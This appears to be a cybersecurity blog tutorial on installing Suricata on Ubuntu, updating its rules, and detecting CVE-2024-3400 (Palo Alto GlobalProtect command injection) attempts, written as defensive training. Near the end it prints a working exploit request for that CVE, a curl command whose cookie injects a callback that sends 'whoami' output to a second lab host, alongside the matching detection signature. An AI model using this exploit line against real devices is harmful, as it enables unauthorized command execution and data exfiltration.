How to Install and Configure Suricata on Ubuntu

Ahmet Aytemiz
July 8, 2024
How to Install and Configure Suricata on Ubuntu

IDS (Intrusion Detection System) and IPS (Intrusion Prevention System) are basic components of any Security Operation Center that help detect and prevent unauthorized use of computer systems or networks. 

While IDSs have detection capabilities, IPSs have prevention capabilities. IDS/IPS systems provide detection and prevention capabilities by analyzing network traffic to detect malicious content. There are two types of IDS/IPS systems in the cybersecurity industry: Host-based and network-based.

“Suricata is a high-performance Network IDS, IPS, and Network Security Monitoring Engine. Suricata is open source and owned by a community-run non-profit foundation, the Open Information Security Foundation (OISF). Suricata is developed by the OISF.” (Source:

The Suricata source code is licensed under version 2 of the GNU General Public License.

Now we will install and configure Suricata on Ubuntu as a host-based intrusion detection system, which is the default mode.


  • Ubuntu operating system running on a physical or virtual machine
  • A stable internet connection to download the Suricata 
  • Your best hypervisor if you use a virtual machine 


  • Get the latest package list with apt-get
  • Install Suricata on the Ubuntu
  • Edit the Configuration File of Suricata
  • Update Suricata Rules
  • Understand the structure of the Suricata rules
  • Detect Exploit Attempt CVE-2024-3400 with Suricata


Getting the Latest Package List with apt-get

First, we should update the packages on Ubuntu with the following command:

sudo apt-get update

Now, we are ready to install Suricata.

Installing Suricata on Ubuntu

Installing Suricata on Ubuntu is quite easy. All we need to do is to use the following command:

sudo apt-get install suricata -y

To find out the Suricata version on Ubuntu, just type the following command:

suricata -V

After downloading Suricata, you can examine the status of the Suricata service with the following command::

systemctl status suricata

Edit the Configuration File of the Suricata

Suricata runs according to information in the /etc/suricata/suricata.yml file. The most important part of the configuration file /etc/suricata/suricata.yml is the part where we specify which network address and which interface Suricata is to monitor. In this case, we will monitor the Ubuntu network interface card and acquire the IP address of the Ubuntu machine.

Using the following command, let's check the network interface card of the Ubuntu machine and its IP address:

ip a

Before editing the configuration file, we should stop the Suricata service with the following command:

systemctl stop suricata

Now open the configuration file of Suricata with your favorite text editor. First, change the HOME_NET variable to, then change the interface to the ens160 in the af-packet section. Don’t forget to save your changes.

sudo vim /etc/suricata/suricata.yml

Another important point in the configuration is the location of the rule file. Suricata's rule files are specified in the default rule path in the configuration file /etc/suricata/suricata.yml.


By default, Suricata reads rules from the file /var/lib/suricata/rules/suricata.rules. Thus, this file contains Suricata rules.

Updating Suricata Rules

We can download and update Emerging Threats rules on the Suricata with the following command:

sudo suricata-update

Now, we can launch the Suricata service with the following command:

systemctl start suricata

Then check the status of the Suricata service with the following command:

systemctl status suricata

Understanding Suricata Rule Structure

To protect our environment, understanding the Suricata rule structure is critical. Let's work through an example case to put theory into practice. 

First, search for the cve-2024-3400 Palo Alto Command Injection Vulnerability rule in the suricata.rules file using the following command:

sudo cat /var/lib/suricata/rules/suricata.rules | grep CVE-2024-3400

alert http any any -> $HOME_NET any (msg:"ET WEB_SPECIFIC_APPS Palo Alto GlobalProtect Session Cookie Command Injection Attempt (CVE-2024-3400)"; flow:established,to_server; http.cookie; content:"SESSID="; startswith; content:"/opt/panlogs/tmp/device_telemetry/"; within:80; fast_pattern; content:"|60|"; within:21; content:"|24 7b|IFS|7d|"; within:30; reference:cve,2024-3400; reference:url,; classtype:trojan-activity; sid:2052122; rev:1; metadata:affected_product Palo_Alto_Networks, attack_target Networking_Equipment, tls_state TLSDecrypt, created_at 2024_04_16, cve CVE_2024_3400, deployment Perimeter, deployment Internal, deployment SSLDecrypt, former_category WEB_SPECIFIC_APPS, performance_impact Low, confidence High, signature_severity Major, updated_at 2024_04_16; target:dest_ip;)

This rule generates an alert if all of the following conditions are met:

  • If an HTTP request is received at the HOME_NET destination IP address specified in the configuration file with any source IP address,  port, and destination port.
  • If the Cookie field in the HTTP request contains the value "SESSID".
  • If the Cookie field in the HTTP request contains the value "/opt/panlogs/tmp/device_telemetry".
  • If the Cookie field in the HTTP request contains the value `(|60|).
  • If the Cookie field in the HTTP request contains the value ${IFS} (|24 7B|IFS|7d).

Detecting Exploit Attempt CVE-2024-3400 with Suricata

Now we are going to attack from the attacker's machine, which is sending the CVE-2024-3400 exploit request, with the following command:

curl http[:]//172[.]16.101.132/global-protect/login.esp -k -H 'Cookie: SESSID=./../../../opt/panlogs/tmp/device_telemetry/hour/aaa`curl${IFS}172[.]16.101.131:4444?user=$(whoami)`'

Let's have a look at exploitation attempts with Suricata. Suricata logs are stored in the file /var/log/suricata/eve.json by default. To display the logs neatly, we can use jq. To view exploitation attempts, use the following command:

cat /var/log/suricata/eve.json | grep CVE-2024-3400 | jq .


Suricata is an open-source IDS/IPS and network monitoring system that is widely used in the cybersecurity industry due to its large community and ease of usage. Suricata can be used for various tasks such as:

  • IDS - Intrusion Detection System
  • IPS - Intrusion Prevention System
  • NSM - Network Security Monitoring System
  • FPC - Full Packet Capture
  • Conditional Packet Capture
  • Firewall 

In this article, we explained how to install Suricata as a host-based IDS, install Suricata rules from the Emerging Threats signature database, analyze the CVE-2024-3400 signature, and finally detect CVE-2024-3400 exploitation attempts with Suricata. 

letsdefend description card

You might also be interested in ...

Start learning cybersecurity today